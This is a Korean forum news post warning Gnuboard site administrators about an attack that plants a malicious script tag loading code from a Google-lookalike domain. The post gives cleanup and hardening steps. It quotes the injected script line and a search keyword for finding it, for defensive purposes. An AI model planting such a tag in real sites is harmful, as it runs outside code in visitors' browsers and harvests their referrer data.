• 회원가입
  • 로그인
  • 구글아이디로 로그인

[news] 오래된 그누보드에 광고 악성코드 심는 해킹주의

2,646  

오래된 그누보드 해킹주의보

 

그누보드 관리자 페이지 > 환경설정 > 기본환경설정 > 추가 메타태그 부분에 아래와 같은 코드가 심어져 있는지 체크.


<script src=https://cdn.jquerygoogle.com/jquery.min.js></script>

 

위 코드는 구글링크를 가장해 (외부스크립트 실행 /사용자 리퍼러 정보 수집)해 사이트에 광고 배너 띄우는 악성코드이니, 발견 즉시 삭제하고 아래 조치를 시행.

  • 그누보드를 최신버전으로 업그레이드
  • 백신으로 PC 검사
  • 최고관리자 패스워드 변경
  • FTP 및 DB 비밀번호 변경
  • FTP 접속해 파일 내려받아, 여러파일 검색 지원되는 유틸(에디트플러스, VSCODE 등)로 'jquerygoogle' 키워드 검사해 해당 코드를 심는 코드가 파일에 있진 않는지 체크.

  

관련글: (231023) https://sir.kr/cm_free/1670736


분류 제목
web 리눅스 보안 업그레이드만 진행하기
sports U20 축구 월드컵 조별 1차전 (프랑스 1 : 2 한국)
talk mp3 음악파일을 삭제 중입니다. 2
girl 일본 걸그룹 「愛Dream (아이드림)」 멤버 오오니시 하놈 (大西波音) 댄스 영상
ucc 딸기 하트 좋아하는 박민정이 날 괴롭힌다 [웹드라마]
dance 소녀시대 - 훗 (Hoot) (DANCE COVER)
ucc 삼성 발전사(?) 이야기. (이병철 → 이건희 → 이재용)
site 모바일 유튜브 확대 재생기 (Mobile Youtube Magniplayer)
talk 북한 신형 극초음속 미사일 개발 성공 발표 남북한 입장 차이
girl 한옥 체험 중인 찐빵녀 찰나의 방심 후 철벽방어
web PHP - 사용자 입력값 보안처리 수단
girl 박은빈 명언 - 「해내야죠.」
web 그누보드 업데이트 시, 기존 깃허브 퍼머링크 유지
web CSS 핵심 3대장/삼대장 (찾기 → 수정 → 반영) = 찾아서 수정 후 변경사항 적용하기
talk KF94 마스크 제대로 쓰는 법
talk 개발자 님들, $_POST 귀신 만나본 적 있으신가요?
dance 치어리더 하지원 님 청반바지 패션 댄스
ucc 어느 날 동거를 시작했다 [유머/웹드라마]
vote 그누보드5에서 그누보드6로 넘어갈건가요? 설문 중
dance 보는 것만으로도 건강에 아주 좋은 셔플 댄스
75/163
목록
찾아주셔서 감사합니다. Since 2012